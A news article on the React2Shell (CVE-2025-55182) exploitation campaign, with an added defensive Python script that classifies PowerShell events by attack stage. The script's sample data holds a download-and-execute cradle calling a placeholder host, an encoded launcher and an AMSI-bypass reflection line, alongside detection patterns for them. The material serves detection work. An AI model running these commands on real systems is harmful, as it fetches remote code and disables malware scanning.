Botnets on the Run: React2Shell Exploit Sparks Global Cloud Crimewave
Over 8 million cyberattacks flood the internet as hackers race to weaponize a devastating React Server Components vulnerability.
It began as a routine vulnerability disclosure - a flaw in the React Server Components Flight protocol. But in just a few months, “React2Shell” (CVE-2025-55182) has spiraled into a cybercrime juggernaut, with more than 8.1 million attack attempts recorded worldwide. With the attacks still arriving by the hundreds of thousands each day, security teams are scrambling to keep up with a threat that’s as fast-moving as it is relentless.
The Anatomy of a Modern Exploitation Frenzy
React2Shell isn’t just another bug - it’s a path to remote code execution on any server that handles React Server Components Flight payloads, which means React itself and the frameworks built on it, Next.js first among them. The vulnerable code runs inside the application server, with whatever permissions the production process has, so a successful exploit hands the attacker those permissions directly. In the wrong hands, it’s an open invitation to take control of servers, exfiltrate data, and launch further attacks.
Threat intelligence firm GreyNoise sounded the alarm as attack volumes exploded, peaking at over 430,000 daily attempts in December 2025 and now holding steady at around 300,000–400,000 per day. The scale is staggering: attackers have deployed over 70,000 unique payloads, constantly tweaking their methods to slip past defenses. Network forensics reveal a dizzying array of 700 HTTP client fingerprints and 340 TCP stack variations - a sign that a wide mix of tooling, from commodity botnets to purpose-built scanners run by professional threat actors, is in the game.
Clouds of Suspicion: AWS and the Rise of Attack-as-a-Service
Cloud computing isn’t just for startups and enterprise apps anymore - it’s the infrastructure of choice for cybercriminals. Grouped by source network (ASN), traffic from Amazon Web Services (AWS) address space alone accounts for over a third of all observed attack traffic, with the top 15 cloud providers making up nearly 60 percent. Attackers spin up new virtual servers, launch their attacks, and disappear - sometimes within hours. Half of the malicious IPs involved were first seen after July 2025, underscoring just how quickly attackers can adapt and redeploy, and how little value a blocklist built last quarter still holds.
Payloads, PowerShell, and Persistence
The typical attack unfolds in stages. First come simple “proof-of-execution” commands - a single arithmetic expression run through PowerShell on the target. If the result comes back, the attacker knows remote code execution works, and the probe leaves little evidence behind. If the coast is clear, attackers escalate to Base64-encoded PowerShell payloads, layering obfuscation on top and using “DownloadString” to fetch a second stage from their own infrastructure and run it in memory. The final payloads often aim to disable Windows’ built-in Antimalware Scan Interface (AMSI), using .NET reflection to reach into AMSI’s internal state so that later script is never scanned, slipping past even hardened endpoint defenses.
Defensive Moves: What Works and What Doesn’t
Static IP blocklists are quickly outpaced by the attackers’ revolving door of new infrastructure. Security experts urge organizations to patch React and Next.js systems immediately and to use dynamic threat intelligence feeds for blocking. On endpoints, defenders should monitor for suspicious PowerShell activity - especially encoded commands, “DownloadString” usage, and AMSI bypass patterns. Enabling PowerShell Script Block Logging, which records the content of every script block as Windows Event ID 4104 in the Microsoft-Windows-PowerShell/Operational log, can be the difference between catching an early-stage compromise and becoming the next victim; because the event carries the script as PowerShell actually runs it, an encoded or obfuscated payload shows up in the clear.
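The detections listed above, run over a handful of constructed script-block events as an added example (this is not code from the article or from GreyNoise). The hostnames, the 203.0.113.10 download host and the event field names are made up for illustration; the regular expressions are heuristics to be tuned, not a vendor signature set. The script decodes `-EncodedCommand` payloads (Base64 of UTF-16LE text), then maps each event onto the three stages described in the article: an arithmetic probe, an encoded download cradle, and an AMSI bypass via reflection.

```python
"""Triage PowerShell script-block events against the React2Shell post-exploitation chain.

Added example, not part of the original article. Sample events are constructed;
real Event ID 4104 records carry the script text in ScriptBlockText, and
process-creation command lines can be fed through the same functions.
"""
import base64
import re

# Matches -e, -ec, -enc, -EncodedCommand ... followed by a Base64 blob (heuristic).
ENCODED_FLAG = re.compile(r"-e(?:c|n[a-z]*)?\b\s+([A-Za-z0-9+/=]{16,})", re.I)

# Stage number -> (indicator name, pattern). Higher stage = deeper into the chain.
STAGE_PATTERNS = {
    # Stage 1: a bare arithmetic expression such as "6201*7" used to confirm execution.
    1: ("proof_of_execution", re.compile(r"^\s*\d+\s*[*+\-/]\s*\d+\s*$")),
    # Stage 2: download cradles that fetch and run a second stage in memory.
    2: ("download_cradle", re.compile(
        r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|\bIEX\b|Invoke-Expression", re.I)),
    # Stage 3: reflection against AMSI internals to switch scanning off in-process.
    3: ("amsi_bypass", re.compile(r"AmsiUtils|amsiInitFailed|AmsiScanBuffer|amsi\.dll", re.I)),
}


def decode_encoded_command(text):
    """Return the UTF-16LE script hidden behind -EncodedCommand, or None if absent/invalid."""
    m = ENCODED_FLAG.search(text)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):  # binascii.Error is a ValueError
        return None


def classify(event):
    """Classify one event; stage 0 means nothing matched."""
    text = event["ScriptBlockText"]
    decoded = decode_encoded_command(text)
    parts = [text] + ([decoded] if decoded is not None else [])
    hits, stage = [], 0
    for s, (name, rx) in sorted(STAGE_PATTERNS.items()):
        if any(rx.search(p) for p in parts):
            hits.append(name)
            stage = max(stage, s)
    if decoded is not None:
        # An encoded launch is itself stage-2 behaviour in this campaign.
        hits.append("encoded_command")
        stage = max(stage, 2)
    return {"Host": event["Host"], "EventID": event["EventID"], "stage": stage,
            "indicators": hits, "decoded": decoded}


def triage(events):
    """Findings with stage >= 1, deepest stage first, so an AMSI bypass is reviewed before the probe."""
    return sorted((f for f in map(classify, events) if f["stage"] > 0),
                  key=lambda f: f["stage"], reverse=True)


# --- constructed sample events (hostnames and download host are fictitious) ---
STAGE2_SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10/s2.ps1')"
STAGE2_B64 = base64.b64encode(STAGE2_SCRIPT.encode("utf-16-le")).decode("ascii")

SAMPLE_EVENTS = [
    {"EventID": 4104, "Host": "web-01", "ScriptBlockText": "Get-ChildItem C:\\inetpub\\logs"},
    {"EventID": 4104, "Host": "web-01", "ScriptBlockText": "6201*7"},
    {"EventID": 4104, "Host": "web-02",
     "ScriptBlockText": f"powershell.exe -NoP -W Hidden -enc {STAGE2_B64}"},
    {"EventID": 4104, "Host": "web-02",
     "ScriptBlockText": "[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils')"
                        ".GetField('amsiInitFailed','NonPublic,Static')"},
]

if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f"{f['Host']}  stage={f['stage']}  {', '.join(f['indicators'])}")
        if f["decoded"]:
            print("    decoded:", f["decoded"])
```

The ordering matters in practice: seeing a stage-1 probe and a stage-3 bypass on the same host within minutes is the strongest signal that the React2Shell foothold was real and is being used, and that host should be treated as compromised rather than merely scanned.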
Conclusion: A New Normal for Web App Security
The React2Shell campaign is a wake-up call for the internet’s defenders. As attackers industrialize their operations, leveraging the cloud and automation, vulnerabilities are weaponized at breakneck speed. The lesson is clear: rapid patching, real-time intelligence, and vigilant endpoint monitoring are the new frontline in the battle against cybercrime’s ever-evolving arsenal.
WIKICROOK
- Remote Code Execution (RCE): An attacker runs code of their own choosing on a victim’s system, often leading to full control or compromise of that system.
- PowerShell: PowerShell is a Windows scripting tool used for automation, but attackers often abuse it to perform malicious actions stealthily.
- Autonomous System Number (ASN): An ASN uniquely identifies a collection of IP networks managed by a network operator, enabling efficient routing and communication between networks on the internet.
- AMSI (Antimalware Scan Interface): AMSI is a Windows feature that lets security software inspect script content (PowerShell and similar) as it is about to run, after any obfuscation has been undone, so that hidden malware can be detected and blocked.
- Obfuscation: Obfuscation is the practice of disguising code or data to make it difficult for humans or security tools to understand, analyze, or detect.